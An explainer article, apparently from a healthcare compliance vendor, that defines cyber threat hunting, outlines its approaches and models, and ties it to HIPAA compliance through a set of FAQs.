What is threat hunting?

According to IBM, “Threat hunting, also known as cyberthreat hunting, is a proactive approach to identifying previously unknown, or ongoing non-remediated threats, within an organization's network.”

Understanding threat hunting

Threat hunting is important in cybersecurity because automated tools can’t catch every threat. While these tools and security teams handle most issues, about 20% of threats are more advanced and can slip through, often staying hidden for nearly 280 days. These lingering threats can lead to data exposure and, on average, cost companies close to 4 million dollars, with long-term impacts. By hunting for these threats, organizations can catch attacks faster, minimizing damage and costs tied to prolonged breaches.

Kunle Fadeyi, Founder of Yieldvestor and tappengine, explains how AI has changed the game: “AI has revolutionized the way we protect systems, networks, and devices. Today, it acts as an essential ally, offering incredible opportunities to detect and destroy threats rapidly before they cause problems.” Kunle further highlights the benefits of AI in threat hunting, noting that “Machine learning offers rapid threat detection through two main channels: automated threat detection and response and operations led by experts. AI systems can detect patterns that may not appear on a human radar, enabling businesses and individuals to get a head start on hackers.”

Through Kunle’s perspective, we see how AI strengthens cybersecurity by analyzing data swiftly and precisely, giving organizations an advantage in spotting threats before they escalate.

The threat hunting process

Effective threat hunting is built upon a foundation of data collection and analysis. Security teams must first ensure that their enterprise security system is in place, gathering and consolidating valuable data from various sources. The data serves as the bedrock for the threat hunting process, providing clues and insights that hunters can use.

Structured hunting

Structured hunting is a methodical approach that begins with a hypothesis based on indicators of attack (IoA) and the tactics, techniques, and procedures of known threat actors. By aligning their investigations with the MITRE ATT&CK framework, threat hunters can often identify the specific threat actor responsible, even before the attacker can cause any damage.

Unstructured hunting

In contrast, unstructured hunting is initiated based on a trigger, such as an indicator of compromise (IoC). The approach allows threat hunters to explore pre- and post-detection patterns, delving into the available data to uncover hidden threats.

Situational or entity-driven hunting

Situational or entity-driven hunting is guided by an organization's internal risk assessment or a trends and vulnerabilities analysis unique to its IT environment. Threat hunters can also use crowd-sourced attack data to identify the latest TTPs of cyber threats and search for these specific behaviors within their own network.

Threat hunting models

Threat hunting can be categorized into three primary models: intel-based hunting, hypothesis-based hunting, and custom hunting.

Intel-based hunting

Intel-based hunting is a reactive model that uses IoCs from threat intelligence sources. Threat hunters can then investigate the malicious activity before and after the alert to identify any potential compromise within the environment.

Hypothesis-based hunting

Hypothesis-based hunting is a proactive model that aligns with the MITRE ATT&CK framework. Threat hunters create hypotheses based on the IoAs and TTPs of known threat actors, allowing them to proactively detect and isolate threats before they can cause damage.

Custom hunting

Custom or situational hunting is tailored to an organization's specific requirements and industry-based methodologies. It involves identifying anomalies in security information and event management (SIEM) and endpoint detection and response (EDR) tools, drawing on both intel-based and hypothesis-based approaches.

Go deeper:

• What is SIEM?
• What is EDR? 

Threat hunting tools

Threat hunters use a variety of tools to enhance their investigative capabilities. These include managed detection and response (MDR) solutions, SIEM platforms, and advanced security analytics tools. By integrating these tools and ensuring the availability of data sources, threat hunters can access the necessary information to guide their investigations and uncover even the most elusive threats.

Threat hunting vs. threat intelligence

While threat intelligence and threat hunting are closely related, they serve distinct purposes. Threat intelligence is the collection and analysis of data regarding attempted or successful intrusions, usually gathered and processed by automated security systems. Threat hunting, on the other hand, uses this intelligence as a starting point to conduct a thorough, system-wide search for bad actors, often uncovering threats that have not yet been detected in the wild.

Related: What is threat intelligence? 

FAQs

What is threat hunting in healthcare, and how does it relate to HIPAA compliance?

Threat hunting is a proactive cybersecurity practice that involves actively searching for signs of malicious activity or threats within an organization's network and systems. In healthcare, threat hunting can identify potential threats to electronic protected health information (ePHI) that may evade traditional security measures. Effective threat hunting helps ensure compliance with HIPAA by detecting and addressing vulnerabilities before they result in data breaches or violations of patient privacy.

What are the potential risks of not implementing threat hunting in healthcare under HIPAA?

• Delayed threat detection: Without proactive threat hunting, malicious activities may go unnoticed until they cause damage or result in a data breach.
• Increased likelihood of data breaches: The absence of threat hunting can lead to undetected vulnerabilities and unauthorized access to ePHI, compromising patient privacy and HIPAA compliance.
• Regulatory penalties: Failure to detect and respond to threats may result in violations of HIPAA’s security and privacy rules, leading to substantial legal and financial penalties.
• Operational disruptions: Undetected threats can disrupt healthcare operations, affecting patient care and the availability of medical records.
• Reputational damage: Data breaches or security incidents resulting from inadequate threat detection can damage the organization’s reputation and erode patient trust.
  
  

How can healthcare facilities implement effective threat hunting practices to maintain HIPAA compliance?

• Utilizing advanced threat detection tools: Employing security information and event management (SIEM) systems and other advanced tools to analyze network traffic and identify suspicious activities.
• Building a skilled threat hunting team: Developing a team of cybersecurity experts trained in identifying and mitigating threats specific to healthcare environments.
• Establishing threat hunting protocols: Creating procedures and guidelines for regularly conducting threat hunts, analyzing findings, and responding to potential threats.
• Integrating threat intelligence: Using threat intelligence to stay informed about emerging threats and vulnerabilities relevant to healthcare.
• Continuous monitoring and analysis: Maintaining ongoing monitoring of network activities and system behaviors to detect early signs of malicious activity.

Learn more: HIPAA Compliant Email: The Definitive Guide